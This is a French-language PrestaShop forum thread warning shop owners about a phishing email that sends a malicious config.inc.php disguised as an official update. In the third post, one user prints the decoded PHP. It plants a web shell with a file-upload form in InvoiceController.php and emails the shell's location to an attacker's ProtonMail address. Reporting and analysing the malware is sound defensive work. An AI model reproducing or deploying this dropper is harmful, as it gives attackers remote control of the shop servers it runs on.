Jump to content
Zouichi

Tentative de piratage

Recommended Posts

Bonjour,

j'ai reçu le mail suivant ce matin, venant d'une adresse non officielle, avec un fichier de config à télécharger et changer sur mon serveur.

Je ne sais pas si l'équipe Prestashop peut agir dessus, mais au moins vous êtes au courant ;)

tentative-piratage.png.b8dca3411ab36afbd91c8b3c866da689.png

Zouichi

Share this post


Link to post
Share on other sites

Malheureusement, PrestaShop ne peut rien faire.

Share this post


Link to post
Share on other sites

Hello,

J'ai reçu le même email.

Voici le code malveillant décrypté:

fwrite(fopen("controllers/front/InvoiceController.php","w+"),'<?php if(isset($_GET["hahahaha"])){echo"<center><font color=#FFFFFF>[uname]".php_uname()."[/uname]";echo"<br><font color=#FFFFFF>[dir]".getcwd()."[/dir]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>Success</b>-->".$_FILES["f"]["name"];}else{echo"<b>Failed";}}}');
$to = "cestdanslaboite@protonmail.com";
$subject = "HAHAHAHA GROSSE MERDE -> " . $_SERVER['SERVER_NAME'];
$header = "from: CDLB <cestdanslaboite@ms.sk>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."\r\n";
$message .= "Path : " . __file__ . " (/controllers/front/InvoiceController.php?hahahaha)";
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);

Ce code modifie votre fichier controllers/front/InvoiceController.php en y ajoutant un formulaire pour uploader des fichiers sur votre serveur.

On peut identifier deux emails: cestdanslaboite@ms.sk qui ne sert à rien mais cestdanslaboite@protonmail.com qui est l'email finale.

On notera également le titre du mail HAHAHHAHA GROSSE MERDE...

Capture d’écran 2020-05-06 à 09.24.20.png

Capture d’écran 2020-05-06 à 09.38.43.png

Share this post


Link to post
Share on other sites

Au moins ils ont de l'humour ;)

Share this post


Link to post
Share on other sites

je ne l'ai pas reçu mais l'un de vous 2 pourrait il "afficher le message en texte brut" ou ""afficher la source" ou "afficher le code source" dans sa boite mail histoire d'avoir plus de données ?

 

il est clair qu'aucune entreprise digne de ce nom n'enverra un mail aussi important de cette manière

Share this post


Link to post
Share on other sites
39 minutes ago, coeos.pro said:

je ne l'ai pas reçu mais l'un de vous 2 pourrait il "afficher le message en texte brut" ou ""afficher la source" ou "afficher le code source" dans sa boite mail histoire d'avoir plus de données ?

 

il est clair qu'aucune entreprise digne de ce nom n'enverra un mail aussi important de cette manière

Envoyé en MP

Share this post


Link to post
Share on other sites

Bonjour,

Je l'ai reçu aussi ce matin ! l'expéditeur est : prestadev@webclienginer.com

sujet : [IMPORTANT] Mise à jour d'un fichier de configuration de notre CMS

Fichier joint : config.inc.php

j'ai supprimé le mail ....

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More